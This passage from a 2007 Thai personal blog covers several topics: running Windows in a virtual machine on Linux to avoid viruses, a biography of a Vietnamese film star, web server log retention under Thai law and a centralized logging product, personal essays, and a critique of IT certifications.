- file system เลือกใช้ Ntfs3-3g เพื่อไว้เม้าหาฮาร์ดดิสที่เป็นระบบ NTFS ครับ นี้เป็นปัญหาหนึ่งที่ linux มีความยุ่งยากกว่าระบบ Windows อยู่
- Virtual machine ส่วนนี้ผมใช้ Open source ชื่อว่า Virtulbox หรือ Vmware player ก็ได้ครับ ทั้งคู่เป็น Open Source

4. ทำการลง Virual Machine เพื่อสร้างระบบปฏิบัติเสริมหลังลงระบบปฏิบัติการหลัก ในที่นี้เราใช้ Virtulbox เพื่อลงระบบปฏิบัติการ Windows XP ที่ต้องใช้ Windows บน Virual Machine เหตุผลคือ
ซอฟต์แวร์บางตัวบนระบบปฏิบัติการ Linux ยังใช้งานได้ไม่สมบูณ์ ว่าเป็นระบบตัดคำ ระบบสร้างกราฟิก รวมถึงการโปรแกรมวาดแผนผังระบบเครือข่าย เป็นต้น สำหรับผมแล้ว พบว่าการส่งข้อมูลเสียงผ่านอินเตอร์เน็ทระบบปฏิบัติการ Windows ทำได้ดีกว่า linux อยู่บ้างในบางเว็บไซด์ และดันเป็นเว็บไซด์ที่ผมต้องเข้าไปฟังเนื้อหาเป็นประจำ จึงต้องเลือกลง Virual Machine เป็น Windows
เมื่อทำการลงเสร็จ เราสามารถตัดหน้าจอโดยใช้เม้าเปลี่ยนเลือกเป็น Windows และ Linux ได้พร้อมกันโดยใช้ ความสามารถของ Beryl
นี้แหละครับเท่านี้เราก็หลีกเลี่ยงการติดไวรัสคอมพิวเตอร์ และพวก สปายแวร์ที่ติดตามโปรแกรมและพฤติกรรมการท่องอินเตอร์เน็ตเราได้มากพอสมควรเนื่องจาก ระบบปฏิบัติการหลักเราคือ Linux และ Windows อยู่ใน Virual Machine แล้วการติดไวรัสที่ทำร้ายต่อระบบปฏิบัติการ Windows ก็จะไม่แพร่กระจายไปสู่ระบบปฏิบัติการหลักที่เป็น Linux ยกเว้นบางกรณี ซึ่งถ้าเทียบตามความน่าจะเป็นแล้วน้อยมากที่เครื่องติดเป็น Zombie จากระบบปฏิบัติการ Linux ได้ยกเว้นจะโดน Hack เข้าสู่ระบบปฏิบัติการภายใน การติดจากการท่องอินเตอร์เน็ตนั้นน้อยกว่า Windows อยู่มาก และไม่ต้องกังวลต้องลงซอฟต์แวร์แอนตี้ไวรัส เพื่อทำให้เครื่องโหลดจากฐานข้อมูลไวรัสที่มีการ Update ตลอด ไม่ต้องกังวลเครื่องจะเป็น Backdoor อีกต่อไปเพราะระบบปฏิบัติการเราเป็น Open Source หากเล่นกันชำนาญเราปรับแต่งได้เองอีกมากมาย
หากต้องการกันไวรัสที่อาจเกิดขึ้นบนระบบปฏิบัติการ linux ก็มี Open source Anti virus ที่เป็นที่นิยมสูงคือ Clamav และหากต้องการใช้เป็นแบบ GUI บน linux ก้มีให้เลือกใช้เป็น klamav อีกด้วยครับ

ประโยชน์ที่ได้รับต่อไปคือการสร้างเสริมนิสัยให้ใช้ Open source และสร้างความคุ้นเคยกับระบบปฏิบัติการ Linux มากขึ้น จะได้ลดค่าใช้จ่ายในการใช้ซอฟต์แวร์ ที่มีลิขสิทธิอีกด้วยครับ
จงจำไว้ว่า ความปลอดภัยข้อมูล เริ่มจากตัวเองก่อน เริ่มจากเครื่องคอมพิวเตอร์ของเรา ต่อจากนั้นคือพฤติกรรมการใช้งานของเรา การใช้ข้อมูลผ่านเครือข่ายของเรา ออกสู่โลกภายนอก หากระบบปฏิบัติการบนเครื่องของเราแข็งแรงพอ และใช้ซอฟต์แวร์อย่างเหมาะสม และพอเพียง จะทำให้เรามีภูมิต้านทานได้ หากทุกคนมีความรู้ และมีความตระหนักในการใช้ข้อมูลสารสนเทศ เราจะสูญเสียเงินในการจัดซื้อจัดจ้้างระบบรักษาความปลอดภัยน้อยลง และปัญหาจุกจิกที่พบในชีวิตประจำวันเราก็จะน้อยลงไปด้วยเช่นกัน

นนทวรรธนะ สาระมาน
Nontawattana Saraman
18/08/50

บทความที่เกี่ยวข้อง http://nontawattalk.blogspot.com/2007/06/windows.html

Monday, August 6

เรื่องสาวญวนในอดีตที่ขอจดจำ


ประวัติของ เถิ่ม ถุย หั่ง หรือ ถั่ม ถุย หั่ง ถ้าออกเสียงแบบสำเนียงใต้ของเวียดนาม (Thẩm Thúy Hằng )
เถิ่ม ถุย หั่ง Thẩm Thúy Hằng เป็นดาราเวียดนามที่มีชื่อเสียงมากคนหนึ่ง เป็นดาวจรัสแสงแห่งภาพยนตร์พานิชย์ของเวียดนามใต้ ตั้งแต่ช่วงปลาย ทศวรรษที่ 1950 ถึง ปลาย 1970 เธอเล่นภาพยนตร์มากมาย ซึ่งก็มีภาพยนตร์เวียดนามที่ร่วมหุ้นกับต่างชาติด้วย ชื่อเสียงของเธอจึงไม่ได้แค่โด่งดังในเวียดนาม แต่เป็นที่รู้จักในประเทศอื่น ๆ ในภูมิภาคด้วย

เถิ่ม ถุย หั่ง ชื่อจริง ชื่อ เหงวียน กิม ฟุ่ง เกิดเมื่อปี 1941 (พ.ศ. 2484) ที่เมือง ห่าย ฟ่อง ( Hải Phòng ) เมืองท่าทางภาคเหนือของเวียดนาม แต่ต่อมาได้ย้ายถิ่นตามครอบครัวมาอยู่ภาคใต้ของเวียดนาม และเติบโตที่ ในจังหวัด อาน ซาง (An Giang ) (อยู่ตอนใต้ของ ไซ่ง่อน หรือนครโฮจิมินห์ ในปัจจุบัน ลงไปอีก) เมื่ออายุ 16 ปี นางสาว กิม ฟุ่ง ได้ไปสมัครเพื่อสอบคัดเลือกเป็นดาราภาพยนตร์ของ บริษัทภาพยนตร์ หมี เวิน โดยที่พ่อแม่ของเธอไม่ทราบ และเธอก็ได้รับการคัดเลือกจากผู้ที่เข้ามาสมัครถึง 2,000 คน เจ้าของบริษัทภาพยนตร์ หมี เวิน ( Mỹ Vân ) ก็ได้ตั้งชื่อเพื่อใช้ในการแสดงให้เธอว่า Thẩm Thúy Hằng เถิ่ม ถุย หั่ง
การแสดงในบทบาทแรกของเธอ คือ บทของ ตาม เนือง ในภาพยนตร์เรื่อง คนงาม แห่ง บิ่ง เซือง
(Người đẹp Bình Dương - เหงื่อย แด็บ บิ่ง เซือง) ในปี 1958 (พ.ศ. 2501) ภาพยนตร์เรื่องนี้ทำให้เธอโด่งดังเป็นที่รู้จัก หลังจากนั้นเธอก็ได้แสดงภาพยนตร์ต่อมาอีกมากมาย ทำให้เธอเป็นดาราของเวียดนามที่แสดงภาพยนตร์มากที่สุดคนหนึ่งในยุค ปลาย 1950 ถึง 1960
ในปี 1969 (พ.ศ. 2512) เธอก็ได้จัดตั้งกลุ่มผลิตภาพยนตร์ของตัวเองด้วย ซึ่งต่อมาได้กลายเป็นบริษัท Vilifilms ซึ่งโด่งดังต่อมาหลังจากนั้น
นอกจากภาพยนตร์แล้ว เธอก็ยังแสดงละครเวที และ ก่าย เลือง (เป็นการแสดงละครดั้งเดิม ของทางภาคใต้เวียดนาม) ด้วย
หลัง ปี 1975 (พ.ศ. 2518) ซึ่ง เวียดนามเหนือและเวียดนามใต้ได้รวมกันแล้ว เธอก็ยังอยู่ในเวียดนาม และยังได้แสดงภาพยนตร์ต่อมาอีกหลายเรื่องด้วย
ในปัจจุบัน เธอได้รับการยกย่องจากรัฐบาลเวียดนาม ให้เป็น ศิลปินดีเด่นของชาติ (Nghệ sĩ ưu tú- เหงะ สี อิว ตู๋) สามีของเธอ คือ เหงวียน เซวียน แหว๋ง ซึ่งเคยเป็นผู้ช่วย นายกรัฐมนตรีด้านการธนาคาร(การคลัง)ของเวียดนามใต้ แต่หลังจากปี 1975 แล้ว เขาก็ได้เป็นที่ปรึกษาทางด้านเศรษฐกิจ ให้แก่ เลขานุการ เหงวียน วัน ลิง และ นายกรัฐมนตรี หวอ วัน เกียด (Võ Văn Kiệt ) ด้วย


จาก: แฟนหนังและเพลงเก่า
ขอบันทึกเก็บไว้ในความทรงจำ
เว็บหนังไทยเก่า : http://www.thaifilm.com/

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Friday, August 3

Web Forensics

Computer Forensics Training with open source toolsในเร็วๆ เราคงได้ทราบข่าวมาว่ามีการบุกรุกเข้าไปเปลี่ยนหน้าเว็บไซด์ราชการที่สำคัญ มาบ้าง และก็มักจะหาผู้กระทำผิดได้ยาก เนื่องจากขาดระบบการเก็บ Log ที่ถูกต้อง ในพระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ว่าด้วยการเก็บ Log ในชนิดของ Web Servers มีข้อบังคับในการเก็บ Log ดังนี้

ประกาศ สำนักงานคณะกรรมการธุรกรรมทางอิเล็กทรอนิกส์

Web Servers

ชนิดของข้อมูลอินเทอร์เน็ตบนเครื่องผู้ให้บริการเว็บ

HTTP log

ข้อมูล log ที่บันทึกเมื่อมีการเข้าถึง web server

Date and time of connection of client to server

วัน และเวลาการติดต่อของเครื่องที่เข้ามาใช้บริการและเครื่องให้บริการ

IP source address

หมายเลข IP ของ ISP ของเครื่องเข้าใช้บริการเชื่อมต่ออยู่

Operation (types of command)

รูปแบบคำสั่งในการเข้ามาใช้ อย่างเช่น search?info=xxx

เป็นการค้นหาข้อมูลโดยข้อมูลที่ค้นหาคือ xxx

Path of the operation

เส้นทางในการเรียกดูข้อมูล

Last visited page

หน้าล่าสุดที่ได้เข้าถึง

Response codes

รหัส code ที่เครื่องให้บริการตอบสนองออกไป


SRAN Web Identity ออกแบบเพื่อเก็บ Log Web Server จากศูนย์กลาง
ที่เราจะทราบได้เมื่อเปรียบเทียบกับข้อบังคับการเก็บ Log ของ Web Server ตาม พ.ร.บ จะเห็นว่าระบบนี้สามารถทำตามมาตรฐานการเก็บ Log Web Server ที่กำหนดไว้ได้
1
รูปที่ 1 การแสดงผลสำหรับ User ทั่วไปที่ไม่ได้ลงทะเบียนสมัคร SRAN Web Identity

SRAN Web Identity เป็นระบบเก็บ Log เว็บไซด์ แบบ Real Time และเป็นการเก็บ Log จากศูนย์กลาง
เราทราบถึงช่วงเวลา ในการเข้าเยี่ยมชมเว็บไซด์ และระบบปฏิบัติการ และชนิดของบราวเซอร์ สำหรับผู้ที่ไม่ได้สมัครสมาชิก จะเห็นว่า IP ที่ปิดบังไว้ .x.x สำหรับผู้ได้สมัคร SRAN Web Identity จะเห็น IP ที่เต็มไม่ได้ซ่อนเร้น

56

รูปที่ 2 ภาพแสดงผลหน้าจอสำหรับผู้ที่สมัครสมาชิก
2
รูปที่ 3 แสดงการเยี่ยมเข้าขมเว็บไซด์ตาม ปี เดือน วัน และ ช่วงเวลา

เราสามารถระบุตำแหน่งผู้เปิดเว็บไซด์ จากเทคโนโลยี gooogle map

45

รูปที่ 4 ผลการแสดงระบุต่ำแหน่งที่อยู่ของ IP ที่เปิดหน้าเว็บไซด์ในขณะนั้น และสามารถดูย้อนหลังดูได้

webid_html_7528507

หากเราใช้ SRAN Web Identity จะช่วยตรวจหาที่มาที่ไป ของการเยี่ยมชมเว็บไซด์ ทั้ังมีเจตนาดีและไม่ดี ได้ระดับหนึ่ง ต้องการศึกษารายละเอียดเพิ่มเติม ได้ที่ http://map.sran.net/webid

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Tuesday, July 24

Good morning sunshine


.. ถนอมยามเช้าเอาไว้ เพื่อใจทั้งวันจะแจ่มใสเหมือนประกายแดด
อย่ายินยอมให้มือใดฉีกทึ้งมัน
ด้วยเหตุผลอันแข็งกระด้าง
ด้วยกรอบคิดอันคับแคบ
อย่าฉีกยามเช้าของเธอ
อย่าฉีกยามเช้าของฉัน
ปล่อยให้บทกวีกังวานไหวอยู่ในเรา

ด้วยชีวิตนั้นแสนสั้นนัก ....

เมื่อวันก่อนเปิดวิทยุได้ยินเสียงคุ้นเคยยามเช้า
ดีเจหนุ่มใหญ่ มาโนช พุตตาล อ่านบทกวีก่อนเปิดเพลงไพเราะ ผมนั่งฟังน้ำเสียง และเนื้อหาบทกวีนี้ ด้วยความประทับใจ กวีนี้อยู่ในหนังสือ ความเรียงมีปีก นกชีวิต

"มีอะไรบ้างที่เคยหลงลืม หรือมองข้ามไปใน ระหว่างทางเดินของชีวิต การเดินเร็วเป็นการใช้ชีวิตตามกระแส แต่มิใช่การเข้าใจชีวิต บางครั้งการเดินทอดหน่องช้าๆ พลางมองเพื่อเห็น สิ่งรอบกายพร้อมหันกลับไปมองย้อนหลังบ้าง อาจทำให้เรา รู้จัก ชีวิตมากขึ้น ฤดูกาลที่ผ่านเลยควรเปิดดวงตาของเรากล่อมเกลาความกระด้าง และเติมความละมุนในดวงใจ"

สำหรับผมแล้วคิดว่า
แสงแดด ที่ส่งมาปะทะผิวกายเรา เมื่อเรามองขึ้นสูง เพื่อสัมผัสความยิ่งใหญ่ แม้ตาของเราจะต้องพ่่ายแพ้ต่อแสง แต่กายเรากับอบอุ่น และพร้อมตั้งความหวัง เพื่อยามเช้าที่สดใส สลายความเศร้าที่มืดมน แสงแดดช่วยชีวิตเรา ให้สร้างชีวิตใหม่ สิ่งแปลกเปลื้อนคงจางหาย หากใจไม่คิดถึง เพราะชีวิตเราต้องดำเนินต่อไป เช่นดั่งยามเช้าที่ควรถนอมเอาไว้ ในความรู้สึก จวบข้ามวันใหม่


Riders On The Storm เพลงของ The Doors

นนทวรรธนะ สาระมาน
Nontawattana Saraman
24/07/07
อ้างอิงบางวลีจาก หนังสือ ความเรียงมีปีก นกชีวิต ของเรวัตร์ พันธ์พิพัฒน์

Tuesday, July 10

Final count down


10 ... 9 .. 8 .. 7 ... เรามักนับถอยหลังเพื่อ แสดงความยินดี กับสิ่งที่เรารอคอยอยู่ จริงไหมว่า ทำไม ปีใหม่เราต้องนับถอยหลังจากสิ้นปี ไปข้ามคืนวันใหม่ ของปีใหม่ ทำไมเราต้องนับถอยหลัง เมื่อเวลา จะปล่อยม้าออกจากลู่วิ่ง และลุ้นต่อไปว่าม้าตัวนั้นจะเข้าสู่เส้นชัย ทำไมเราต้องนับถอยหลัง กับเหตุการณ์อนาคต .. คำตอบคือว่าเพื่อเป็นการแข่งขันอย่างยุติธรรมนะสิ จากตัวเลขและการสมมุติของเราเอง ผลลัพธ์คือความหวังเพื่อหล่อเลี้ยงชีวิตเรานั่นเอง
จากหนังสือเล่มหนึ่งของ ลุค เดอ บราบองแดร์ The Forgotten Half of Change กล่าวในตอนหนึ่งว่า
"ไม่ว่าปัญหานั้นจะเป็นอะไรก็ตาม สิ่งที่เราประสบมาในอดีตจะสร้าง แกน ให้กับระบบของเราในอนาคต ซึ่งก็ยังคงเป็นจริงอยู่อย่างนั้น ทั้งๆ ที่เรารู้มาตั้งแต่ 500 ปีแล้วว่าโลกหมุนรอบดวงอาทิตย์ แต่เราก็ยังคงเห็นดวงอาทิตย์ตก มีนักวิทยาศาสตร์หลายคนมักกล่าวว่าสติปัญญาที่อยู่ในสมองส่วนหน้าไม่่สื่อสารกันเอง
นอกเหนือจากข้อเท็จแล้ว ความเชื่อมั่นก็มีส่วนสำคัญต่อเรื่องราวความสัมพันธ์ระหว่างคำว่า เชื่อ และเห็น ไม่ได้เป็นความสัมพันธ์ทางเดียวแน่นอนว่าเราเชื่อสิ่งที่เราเห็น แต่บางครั้งเราก็เห็นสิ่งที่เราเชื่อ ถ้าคุณเชื่อว่าใครสักคนเป็นคนดี คุณก็จะเห็นความดีในตัวคนๆ นั้น"

เราไม่ได้เห็นโลกอย่างที่มันเป็น แต่เราเห็นมันอย่างที่ เราเป็นต่างหาก

มีเรื่องน่าสนใจเกี่ยวกับตัวเลข ก็คือ เมื่อวันที่ 7 เดือน 7 ปี 07 จริงๆแล้วมันไม่แปลก แต่ความบังเอิญของวันเดือนและปี เป็นเลขชุดเดียวกัน ทำให้มันแปลก บางทีไม่ได้ยึดติดกับเวลา เช่น ศูนย์ข่าว CNN มีนาฬิกาบอกเวลา เพียงเข็มเดียว คือเข็มนาที และผู้ประกาศข่าวไม่กล่าวคำว่า อรุณสวัสดิ์ ไม่กล่าวคำว่า ราตรีสวัสดิ์ ไม่มีคำว่า ลาก่อน หรือ พบกันใหม่ แต่พวกเขาจะกล่าว ว่า ขอต้อนรับเข้าสู่ข่าว เป็นเช่นนี้ตลอด 24 ชั่วโมง CNN ต้องการเป็นผู้นำด้านข่าวตลอดเวลา ทั่วทุกมุมโลก แปลกแต่จริง เรามักจะพูดว่าไม่มีเวลา ทั้งที่เวลาไม่มีตัวตนทางวัตถุ เลย ในวันที่ 7 เดือน 7 ปี 2007 จึงเป็นเพียงการสมมุติทางโลกที่ตั้งขึ้นเท่านั้น ชีวิตเราเป็นอย่างไรบ้างในวันนั้น ... เราจะเห็นโลกอย่างที่มันเป็น หรือ เราจะเห็นโลกอย่างที่เราเป็น กัน

เราเห็นโลก อย่างที่มันเป็น
เมื่อนับย้อนหลังไปในอดีต วันที่ 7 เดือน 7 ที่ผ่านมา
เราเห็นโลกอย่างที่เราเป็น
เช้าวันรุ่งขึ้น ผมได้อ่านข่าวว่า มีคุณแม่ท้องแก่อุ้มท้อง ไปทำคลอดโดยนั่งรถเท็กซี่หมายเลขทะเบียน 7777 ในวันที่ 7 เดือน 7 ปี 07 เด็กที่เกิดใช้ชื่อน้อง เซเว่น (seven) ชังบังเอิญได้ขนาดนั้น
เหตุการณ์ในต่างประเทศ มีเหตุการณ์สำคัญๆ คือ มีการจัดคอนเสิร์ต กู้วิกฤติโลกร้อน Live Earth
มีการจัดอันดับ 7 สิ่งมหัศจรรย์ ของโลกใหม่ (ประเทศที่ ถูกจัดสถานที่ไว้เป็นสิ่งมหัศจรรย์ ชูถ้วยเหมือน บอลโลกเลย เมื่อดูจากข่าว)
เหตุการณ์อื่นๆ ที่พบในวันที่ 7 เดือน 7 ปี 07 มีหลายประเทศจัดแต่งงานจำนวนมาก เพราะถือวันเป็นวันดี โดยรวมทั่วโลก แล้ววันที่ 7 เดือน 7 ปี 07 คนส่วนใหญ่มีความสุข และมีเหตุการณ์มากมาย ในวันเดียวกัน

สำหรับผมแล้ว วันที่ 7 เดือน 7 ปี 07 เป็นวันเหนื่อยพอสมควร ่ฝนตกตลอดช่วงเย็นเลย อีกทั้ง คืนวันนั้นแทบไม่ได้นอนอีกด้วย ถึงไงโดยรวมแล้ว ถือว่าเป็นวันที่ผมมีความสุขดี เพราะการอดนอนนี้เอง : )

ช่วงเย็น ได้ขับรถไปสถานที่หนึ่ง ท่ามกลางฝนพร่ำๆ ได้เปิดคลื่นวิทยุ radio rock 99.5 FM เปิดเพลง Final Count Down ที่เคยโด่งดังมากในยุคหนึ่ง และสร้างพลังให้ต่อสู้ดี เหมือนกับว่า เราต้องนับถอยหลัง เพื่อตัดสินใจ สิ่งใดสิ่งหนึ่งอยู่ มันสำคัญกว่า ตัวเลข ในวันที่ 7 เดือน 7 ปี 07 แน่นอน

็ขอให้ ทุกคน มีเวลาที่ดี เข้าสู่ชีวิต จะได้สราญอารมณ์ ไม่ต้องเก็บความทุกข์ ครับ แบ่งปันเพลงนี้ให้ฟัง I Had a Good Time ของ Boston ลองฟังดู


นนทวรรธนะ สาระมาน
Nontawattana Saraman


europe final count down

Add to My Profile | More Videos

แหล่งข้อมูลอื่นๆ
เพื่อนเก่า Boston http://nontawattalk.blogspot.com/2007/02/boston.html
รูปจาก http://www.smh.com.au/
ข้อมูลจาก http://th.wikipedia.org/wiki/7_กรกฎาคม
หนังสือครึ่งที่ถูกลืม The Forgotten Half of Change เขียนโดย Luc De Brabandere แปลโดย รองศาสตราจารย์ ดร.ณัฐชยา เฉลยทรัพย์ (ขอชมว่าแปลได้ดีมากครับ)

Wednesday, July 4

By your Side


บทสัมภาษณ์ในหนังสือ By your Side ฉบับที่ 27 เดือนกรกฎาคม ของ Ineternet Thailand (inet) เนื้อหาพูดเกี่ยวกับแนวโน้มเทคโนโลยีด้านการรักษาความปลอดภัย บนระบบเครือข่ายสารสนเทศ และที่มาของคำว่า "SRAN" เทคโนโลยีด้านความมั่นคงทางข้อมูลของคนไทย สามารถอ่านและชม Clip Video ได้ที่ http://www.inet.co.th/about/news_magazine.php
http://www.inet.co.th/about/video.php?wmv=sran_256k.wmv


อื่นๆ
บางส่วนการบรรยายในงานเปิดตัวบริการ Cyfence จาก CAT Telecom ตุลาคม 2549

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Friday, June 22

Certification กับความงมงาย


ผมเคยสอบใบประกาศนียบัตร (Certification) ของ Cisco เมื่อ 5 ปีก่อนและได้รับในระดับ CCNA มาแล้ว ในระดับคะแนนที่สูงใช้ได้ พอเวลาผ่านไป ผมมีงานมากมายที่ต้องทำตลอด จึงไม่่ได้ปีกตัวเพื่อไปแสวงหาใบประกาศนียบัตรให้มากมาย , หลายปีผ่านมาผมเองไม่ได้สนใจ Certification ตามกระแสสังคมเลย กับละทิ้งและโยนทิ้ง CCNA ใบที่ควรค่านั้นทิ้งลงถังขยะ อย่างไม่คิดเสียดาย
(รูปจาก http://www.tga-gmbh.de/)

มาช่วงนี้เมื่อดูประกาศการจัดซื้อจัดจ้างและงานที่ต้องเฝ้าบำรุงรักษาระบบเครือข่ายตามองค์กรต่างๆ มักเขียนไว้ว่าต้องการคนที่มี Cert ฯ ครับเป็นสิ่งที่ดี ที่ได้รับคนที่มาปฏิบัติงาน ที่รู้เรื่อง แต่ใบเหล่านี้ ส่วนตัวผมคิดว่ามันก็เป็น
เพียงสิ่งงมงาย
ที่ผ่านมา เห็นนักศึกษาใกล้จบ ต่างเรียงคิวเพื่อสอบใบประกาศนียบัตร เพื่อที่ได้งานทำที่ดี และเงินเดือนสูงๆ ไม่่แปลกอะไรหลอกครับ เพราะมันเป็นแฟชั่น เมื่อก่อนผมก็เป็นเช่นนั้น แต่มาถึงตอนนี้ มีความคิด ความอ่านที่มากขึ้น จึงมองเห็นว่า ทุกอย่างมันมีได้ และมีเสีย การมีใบประกาศนียบัตร เป็นสิ่งที่ดีในแง่ ได้ความรู้ จะดียิ่งขึ้นหากเราไม่ตกเป็นทาสกับใบที่เราสอบได้ นั่นเอง ข้อเสียก็คือเราก็เป็นเพียงผู้ใช้งาน กับมาตรฐานที่คนอื่นเขียนให้ เป็นเครื่องมือของการค้า การตลาดเพื่อประชาสัมพันธ์สินค้านั่นไปเสียแล้ว

ผมมองว่าใบประกาศนียบัตร (Certification) เป็นเพียงใบเปิดทาง เป็นเพียง ผู้ใช้งาน (User) ตามแบนด์ของสินค้านั้นๆ เท่านั้นเอง ไม่ได้หมายถึงจะเป็นผู้วิเศษ ในขณะที่ ใบประกาศนียบัตร (Certification) ทางระบบสารสนเทศเฉพาะทาง มี 2 แบบใหญ่ คือ
- ใบประกาศนียบัตร เฉพาะทาง ใช้กับสินค้า ได้แก่ Cisco , Microsoft , SUN , Redhat อื่นๆ อีกมากมาย เป็นต้น
- ใบประกาศนียบัตร เฉพาะทาง ไม่ได้ยึดติดกับเทคโนโลยี ของสินค้า ได้แก่ CISSP , CISA , GIAC และอื่นๆ
เมื่อมองดูชั้นในของใบประกาศนียบัตร เหล่านี้ ก็ไม่ต่างกับการ เครื่องหมายการค้า ที่เราพร้อมที่จะตกเป็นเหยื่อ เพื่อสำคัญตนเองว่า มีความพร้อมในการปฏิบัติงานอย่างแท้จริง

ที่ต้องกล่าวถึงเรื่องนี้ก็เพราะ ผมไม่อยากให้คนไทยยึดที่ใบประกาศนียบัตรพวกนี้มากมายเกินไปนัก เสียเงิน เสียเวลา เพื่อทุนเท เกินไป มันฟุ่มเฟื่อย ยิ่งแบบที่ยึดติดกับสินค้า หรือเทคโนโลยี นั่นแล้วยิ่งอย่าไปยึดติดเลยครับ เพราะเมื่อไหร่ เวอร์ชั่นมีการเปลี่ยนแปลงเราก็ต้องไปสอบใหม่ เปลี่ยนเทคโนโลยี ก็ต้องไปสอบใหม่ เราก็ตกเป็นเครื่องมือของ ผู้นำเข้าสินค้านั่น ไม่ได้มีองค์ความรู้อย่างแท้จริง
เป็นเครื่องมือเพื่อสร้างน่าเชื่อถือ หรือ ตกเป็นเหยื่อของ เทคโนโลยี จากผลิตภัณฑ์นั่นไปเสียแล้ว ดูจากเจตนาแล้วหลายค่าย พยายามสร้างความเชื่อนี้ ในสถาบันการศึกษาของประเทศไทย ปลูกฝั่งตั้งแต่เรียน จน เรียนจบคิดว่า ผลิตภัณฑ์นั่นคือสิ่งที่ถูกต้องและดีที่สุด สำหรับเขา ตกเป็นทาสทางเทคโนโลยี โดยยินยอม

สิ่งที่อยากให้เป็น คือ เราควรนำความรู้ที่ได้จากการสอบใบประกาศนียบัตรเฉพาะทาง ตามมาตรฐานของฝรั่งเขา มาประยุกต์ใช้ในการทำงาน เสมือนหนึ่ง กระบี่อยู่ที่ใจ ที่ผมเน้นนักจะดีกว่า เชื่อผมหรือไม่ว่า คนทำ Router ได้รู้กลไกลการทำงานของ Router ทั้งหมดอาจไม่ได้ CCIE ก็ได้ แต่คนที่สอบได้ถึงระดับ CCIE คือ ผู้ใช้ อย่างชำนาญ อาจไม่สามารถที่จะสร้าง Router ได้เองได้เลย
ดังนั้นใบประกาศนียบัตร ที่ดี คือ ประสบการณ์จริงที่ได้ทำงานในด้านที่ตนเองถนัด อย่างชอบธรรม และนำความรู้ที่ได้จากประสบการณ์ ถ่ายทอด ให้ความรู้กับผู้อื่น และสร้างนวัตกรรมใหม่ ที่มีประโยชน์กับสังคม คนผู้นั้นจึงน่ายกย่อง อย่างแท้จริง
หลายคนคงคิดว่าผมเป็นพวกแอนตี้สังคม ไม่่ทำตามกระแสสังคมนัก ก็เพราะผมเป็นพวกนักรบนอกสังเวียนนะสิ โดยจิตวิญญาณผมแล้วอยากให้สังคมที่เราอยู่ดีกว่าที่เป็นอยู่ มีความคิดที่หลายมิติขึ้น โดยเฉพาะมุมมองด้านเทคโนโลยีสารสนเทศ

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Thursday, June 21

เลิกใช้ windows

ปกติในการเขียน blog ผมได้ใช้ระบบปฏิบัติการ windows ในการสร้างบทความมาโดยตลอด อาจมีการสลับการใช้งานระบบปฏิบัติไปบ้างในบางครั้ง โดยปกติเครื่อง notebook ส่วนตัวมี สองระบบปฏิบัติการ คือ boot linux สลับ Windows ตามอารมณ์ แต่มาตอนนี้ ผมประกาศเลิกใช้ ระบบปฏิบัติการ Windows เครื่องนี้ปัจจุบันไม่มีระบบปฏิบัติที่เป็น Windows อยู่เลย


ก่อนหน้านี้ผมได้ประกาศเลิกใช้โปรแกรมแอนตี้ไวรัส ทุกค่ายไปเรียบร้อยหมดแล้ว ใช้แต่ของที่พัฒนาเองคือ
SRAN Anti virus (พัฒนาต่อยอดจากซอฟต์แวร์ Open Source Clamav) เหตุผลที่เลิกใช้ ซอฟแวร์เหล่านี้ ทั้งที่เลิกยากพอๆกับติดเหล้า ติดบุหรี่เชียวล่ะครับ
เหตุที่เลิกใช้ซอฟต์แวร์ และระบบปฏิบัติการ Windows มี 2 เหตุผลหลัก

เหตุผลข้อแรก
หลังๆ ผมสังเกตเห็นพฤติกรรมความไม่ปกติ ที่เกิดขึ้นกับข้อมูลส่วนตัว เมื่อเราใช้งานซอฟแวร์ที่มีการระบุ License เมื่อมีการอัพเดทข้อมูลผ่านระบบอินเตอร์เน็ท เพียงแค่เกิดความสงสัยส่วนตัว ไม่ได้แอนตี้บริษัท Microsoft ไม่ได้แอนตี้บริษัทที่ทำซอฟต์แวร์แอนตี้ไวรัสแต่อย่างใด

เหตุผลข้อที่สอง ผมไม่อยากยึดติดกับข้อผูกมัดทางธุรกิจ และเพื่อไม่เป็นการแอบใช้ซอฟต์แวร์เถื่่อน ที่ถือได้ว่าเป็นการละเมิดลิขสิทธ์ทางปัญญาผู้ผลิตเทคโนโลยีนั้น

ปัจจุบันผมได้ลงระบบปฏิบัติการ Ubantu เป็นสายพันธ์ที่พัฒนาต่อจาก Debian Linux ่สามารถควบคุมซอฟต์แวร์ทั้งหมดที่ใช้งานได้ พร้อม Source Code แก้ไขเองได้ ไม่ต้องระวังเรื่องการละเมิดลิขสิทธ์ซอฟต์แวร์ และเพื่อทำตัวเอง เป็นตัวอย่่าง ในการใช้งานอินเตอร์เน็ท แบบมีวินัย มีความตระหนัก (Awareness) และระมัดระวังแบบมีสติ โดยควบคุม พฤติกรรมการใช้งานก็เหมือนมีเกาะคุ้มกันภัยในเครื่องคอมพิวเตอร์ของเรา เวลาใช้งานอินเตอร์เน็ทแล้ว


ขณะนี้เราตกเป็นทาสทางเทคโนโลยีไปแบบไม่รู้ตัวเสียแล้ว ปัจจุบัน ประเทศไทยสูญเสียเงินค่าลิขสิทธ์ซอฟต์แวร์จำนวนมาก วิธีการหนึ่งที่จะลดค่าใช้จ่ายเหล่านั้นได้คือต้องสร้างคนให้หันมาใช้ระบบ ปฏิบัติการที่เป็น Open source และซอฟต์แวร์ Open Source กันมากขึ้น พร้อมทั้ง สร้างองค์ความรู้ในการต่อยอดจาก Open Source จากโค้ดที่ให้มานำมาประยุกต์ใช้ต่อยอดต่อไป ทำให้เรามีภูมิต้านทานด้านเทคโนโลยีเองได้โดยปริยาย

นนทวรรธนะ สาระมาน
Nontawattana Saraman

Sunday, May 27

ลมหายใจระบบเครือข่าย

หากลมหายใจของคนเรา มีการหายใจเข้า และ ออก รับออกซิเจนเพื่อการดำรงชีวิต ลมหายใจของระบบเครือข่าย ก็เป็นเช่นกันแต่แทนที่เป็นอากาศ กับกลายเป็นข้อมูลสารสนเทศ หรือที่เรียกว่า Information Data ที่เข้า และ ออก ตลอดเวลาในระบบเครือข่ายที่เราใช้งาน ...

